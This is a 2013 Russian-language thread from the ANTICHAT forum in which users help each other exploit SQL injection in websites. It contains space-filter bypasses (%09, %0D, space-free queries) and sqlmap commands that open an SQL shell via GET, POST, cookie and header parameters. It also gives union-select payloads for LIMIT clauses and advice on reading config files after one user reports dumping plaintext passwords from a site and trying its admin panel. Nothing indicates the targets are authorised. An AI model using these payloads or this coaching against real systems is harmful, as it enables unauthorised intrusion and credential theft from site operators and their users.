HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22161  
Старый 05.03.2013, 23:31
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
иньекция в лимите, поэтому ничего и не выходит
Инъекция в Лимите прекрасно крутится.

Тут правильнее сказать "инъекция в лимите с использованием в запросе order by".
 
Ответить с цитированием

  #22162  
Старый 06.03.2013, 00:24
Чакэ
Guest
Сообщений: n/a
Провел на форуме:
90728

Репутация: 62
По умолчанию

пацаны, как вы боритесь с ЧПУ?

GET

/page/id/5 - normal

/page/id/6-1 - показывает страницу 5

/page/id/5'

Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
уже понятно что всё довольно таки просто.

НО сраное чпу передаёт плюсы "как есть"

Цитата:
Сообщение от None  
the right syntax to use near ''+and+--+' at line 1
та же хрень с пробелами, они превращаются в %20

/**/ - тоже не катит, этот каким-то образом влияет на само правило ЧПУ и параметры уходят не тому скрипту.
 
Ответить с цитированием

  #22163  
Старый 06.03.2013, 00:51
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

Без ссылки, как ты понимаешь, трудно сказать, но попробуй поиграйся с альтернативами пробела.

%09

%0D

%0A

Ну и не стоит забывать про "безпробельный" вариант запроса, что-то типа:

select(1)from(users)where(id=1)
 
Ответить с цитированием

  #22164  
Старый 06.03.2013, 01:35
Чакэ
Guest
Сообщений: n/a
Провел на форуме:
90728

Репутация: 62
По умолчанию

Цитата:
Сообщение от Га-Ноцри  
Га-Ноцри said:
Без ссылки, как ты понимаешь, трудно сказать, но попробуй поиграйся с альтернативами пробела.
%09
%0D
%0A
Ну и не стоит забывать про "безпробельный" вариант запроса, что-то типа:
select(1)from(users)where(id=1)
игры с %09 etc ни к чему не приводят. запрос получается таким

select * from tbl where id=5%0D

в итоге

Цитата:
Сообщение от None  
Unknown column '0D' in 'where clause'
уязвимый параметр находится не в скобках, а значит "безпробельный" тоже не получится.
 
Ответить с цитированием

  #22165  
Старый 06.03.2013, 10:22
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от Чакэ  
Чакэ said:
та же хрень с пробелами, они превращаются в %20
/**/ - тоже не катит, этот каким-то образом влияет на само правило ЧПУ и параметры уходят не тому скрипту.
Это ЧПУ, можно попробовать реализовать так, как делается в REQUEST_URI и подобных случаях - В зависимости от сервера, мы напрямую в запросе(БЕЗ БРАУЗЕРА) без кодирования пробуем передать различные символы - (), TAB, %09, + и т.п. и с их кодированием соответственно и смотрим на то, что получается. Если никакие символы не интерпретируются в их аналоги, а всё лишнее кодируется то инъекцию почти всегда провести невозможно, за исключением некоторых простых случаев.

Нужно попробовать использовать различные методы кодирования и определить пропускные символы, интерпретацию мультибайтовых кодировок, какие-то непонятные случаи и дальше исходить от этого.
 
Ответить с цитированием

  #22166  
Старый 06.03.2013, 11:41
zloy_fantom
Guest
Сообщений: n/a
Провел на форуме:
15180

Репутация: 0
По умолчанию

Цитата:
Сообщение от \/IRUS  
\/IRUS said:
в случае если параметр передается явно в
GET
запросе и именем
s
, по условию исключаем Error-Based и Union техники то SQL-shell можно будет вызвать:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php?s=1" --technique="BT" --level=5 --sql-shell
в
POST
параметре
s
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --data="s=1" --technique="BT" --level=5 --sql-shell
в
Cookie
параметре
s
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --cookie="s=1" --technique="BT" --level=5 --sql-shell
в
Referer
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p referer --technique="BT" --level=5 --sql-shell
в
User-Agent
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p user-agent --technique="BT" --level=5 --sql-shell
в любом добавочном хидере:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --headers="Accept-Language: fr\nETag: 1%1" --technique="BT" --level=5 --sql-shell
и т.д.
Эх, попробовал.....

происходит редирект на login.php, ни auth ни cookie не помогают
 
Ответить с цитированием

  #22167  
Старый 06.03.2013, 14:03
ukrpunk
Guest
Сообщений: n/a
Провел на форуме:
7946

Репутация: 5
По умолчанию

Подскажите..

Вобщем раскрутил скулю, получил логин|пароль, но подозрительно что пароли хранятся в бд без хеширования, т.е. просто пасс лежит. Беру пары логин|пароль, пробую зайти в админку - нифига В чем может быть причина? В бд колонок с логинами\паролями больше нет...
 
Ответить с цитированием

  #22168  
Старый 06.03.2013, 14:20
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Данные для входа хранятся не в БД, а в файле. Такое часто встречается, смиритесь!

Если есть права у пользователя БД на работу с файлами и известен пусть к сайту, можете попробовать поискать и почитать файлы конфигов!
 
Ответить с цитированием

  #22169  
Старый 06.03.2013, 18:30
borntobebad
Новичок
Регистрация: 23.03.2009
Сообщений: 14
Провел на форуме:
74797

Репутация: 0
По умолчанию

BigBear . где прочитать на тему раскрутки лимита ? И еше , тут лимит на SELECT нарисовался , его можно обойти ? ели да то где почитать на эту тему ???
 
Ответить с цитированием

  #22170  
Старый 06.03.2013, 18:37
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от borntobebad  
borntobebad said:
BigBear . где прочитать на тему раскрутки лимита ? И еше , тут лимит на SELECT нарисовался , его можно обойти ? ели да то где почитать на эту тему ???
Выдержка со RDOT'а

В limit, offset

(в запросе не должен присутствовать order by)

script.php?par=1,111111111 union select version(),2,3,4--

script.php?par=111111111 union select version(),2,3,4--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ